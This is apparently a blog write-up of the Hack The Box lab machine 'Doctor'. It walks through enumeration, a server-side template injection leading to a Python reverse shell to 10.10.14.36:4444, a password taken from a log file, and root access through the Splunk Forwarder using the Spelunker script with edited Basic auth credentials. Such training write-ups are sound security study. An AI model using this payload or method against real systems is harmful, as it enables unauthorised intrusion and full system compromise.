tsustyle

Red Team Aspirant

Doctor

1 minute read

img

Port Scanning and general enumeration (Nmap, FFuF)

img

Interesting. 8089 port for Splunkd. Doing some reasearch I found out that this port is for the Splunk Universal Forwarder. Let’s keep this in mind for later.

Standard enumeration of the site on port 80 doesn’t reveal anything great, but there is an interesting thing to note

img

doctors.htb.. let’s update our /etc/hosts file and point 10.10.10.209 to doctors.htb

img

New things to play with! Let’s toss ffuf at this while we poke around

ffuf -u doctors.htb/FUZZ -w /path/to/wordlist -c

img

Let’s create an account and see what this app is all about.

img

Testing different payloads for different exploits gave us nothing in return at first glance. But if we go back and check the archive endpoint and check the source we see something interesting..

img

Ah! Vulnerable to SSTI!

Access (SSTI, reverse shell)

I actually covered this in a writeup for a CTF Challenge from Hacktivitycon2020 called Template Shack. This time, though, instead of using slicing to find where subprocess.Popen is, we’ll use this handy payload I found on PayloadAllTheThings

img

After editing it a bit so that it makes a call back to our machine:

.builtins'import'.popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.36",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh", "-i"]);'").read()

We can use that as our title, whatever you want for the body and make the post.

Fire up a listener on your box and reload the archive tab.

Privesc (linPEAS, Spelunker)

So now we have a shell on the box. Let’s see what linPEAS says.

Interesting log file entry

img

Doesn’t look like an email. Maybe the shaun user’s password? Turns out that it is. Strange.

img

Let’s take a look at port 8089 again. As I mentioned earlier, it’s for the Splunk Universal Forwarder. There’s some exploits floating around for it, including a local privilege escalation that we’re going to use.

First, we need to update the Spelunker script, because the script assumes that the creds are admin:changeme.

This is what we need to change:

Authorization: Basic YWRtaW46Y2hhbmdlbWU=

to

Authorization: Basic c2hhdW46R3VpdGFyMTIz

Get the script on to the box, give it the x flag and run it.

Follow the instructions to root!

img

You may also enjoy

Tenet

‘Tenet’ is a medium rated box on Hack the Box. We’ll be using PHP Object Injection to get RCE and identify a race condition in a custom script for privesc.

Skynet

‘Skynet’ is a box on TryHackMe. We’ll be enumerating SMB shares, brute forcing a login and exploiting a Remote File Inclusion vulnerability in Cuppa CMS for a foothold. For our root shell we’ll take a look at exploiting some wildcard injection using a script that’s being run as a cronjob.

FFuF Cheatsheet

This is a Cheatsheet I created for reference when using FFuF

Ready

‘Ready’ is a medium rated box on Hack the Box. We’ll be using a public exploit for a vulnerable Gitlab version for a shell, enumeration and password reuse for privesc and escape a docker container for root